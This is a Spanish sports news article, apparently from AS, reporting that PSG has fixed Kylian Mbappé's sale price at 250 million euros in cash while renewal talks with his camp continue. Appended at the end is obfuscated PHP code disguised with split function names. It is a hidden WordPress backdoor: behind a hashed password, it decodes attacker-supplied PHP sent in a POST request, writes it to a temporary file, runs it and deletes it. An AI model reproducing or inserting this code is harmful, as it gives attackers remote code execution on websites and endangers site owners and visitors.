Mbappé, 250M€; ni más ni menos

El PSG ha fijado el precio del delantero en esa cantidad al contado sin ninguna variación posible. En Qatar están sorprendidos de que no haya oferta del Real Madrid.

El club que quiera fichar a Kylian Mbappé este verano deberá abonar 250 millones de euros al contado. Ni más ni menos. Es la postura que ha adoptado Qatar respecto al jugador, anticipándose al riesgo de perderle gratis el próximo año, aunque las conversaciones entre el PSG y su entorno se han reanudado con una primera reunión este domingo en la que los dirigentes cataríes salieron, según fuentes consultadas, “medianamente optimistas”.

La situación sigue siendo incierta respecto al jugador y su futuro, pero lo que queda claro es que el PSG tiene una posición muy similar a la del año pasado, disponiendo de una temporada entera para renovarle y para intentar persuadirle de que siga en la capital francesa. Hasta el momento, después de reintegrarle en la dinámica del primer equipo, la entidad capitalina no ha recibido ofertas por Mbappé, que se mantiene al margen y supeditando su futuro al último año de contrato que le resta.

El entorno del jugador ya sabe que Qatar ha fijado su precio en 250 millones. Los emisarios qataríes desplazados a París la semana pasada siguen esperando una oferta del Real Madrid, mostrándose sorprendidos de que todavía no se haya producido porque entienden, desde su postura, que el conjunto blanco se arriesgaría a una posible renovación en el caso de que Mbappé siga en la capital francesa, que es el escenario más probable ahora mismo, después del final de mercado.

Si el Real Madrid, que se mantiene al margen en el culebrón de Kylian Mbappé hasta el momento, o cualquier club ofrece 250 millones de euros, el culebrón llegará a su fin. Pese a que el delantero no ha manifestado ni va a notificar en público que quiere marcharse de Paris, que era lo que estaba esperando el PSG que ocurriera si realmente tenía intención de salir en verano, una oferta que satisfaga las pretensiones de los parisinos dejaría vista para sentencia una situación que ha dado continuos giros de guion a lo largo del último lustro.

Si algo ha demostrado Qatar en los últimos años es a tener una fuerza en las negociaciones y una oratoria capaz de desbloquear situaciones insostenibles. Por Mbappé, el optimismo ha aumentado en los últimos días y, aunque no hay ningún acuerdo por su renovación, el PSG tendrá una temporada entera para hacerle cambiar de opinión en su postura de no ampliar su contrato hasta 2025. Tanto el entorno como el delantero ya conocen el precio que han fijado los dirigentes por su venta, a pesar de que el objetivo es mantenerle esta temporada para después volver a entablar negociaciones que culminen con la firma de renovación.

Después de un primer encuentro acontecido este domingo en París, esta semana se volverán a reunir Qatar y el entorno de Kylian Mbappé en la capital francesa. En la reunión podría estar presente Nasser Al Khelaïfi, presidente del PSG. El qatarí ha variado el discurso a lo largo del verano, pasando de la hostilidad a la calma después de haber tenido un breve encuentro con el capitán de la selección francesa, antes del debut liguero del PSG contra el Lorient en el Parque de los Príncipes. Mbappé y el PSG vuelven a conversar y el club se muestra optimista para renovarle.

AS

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}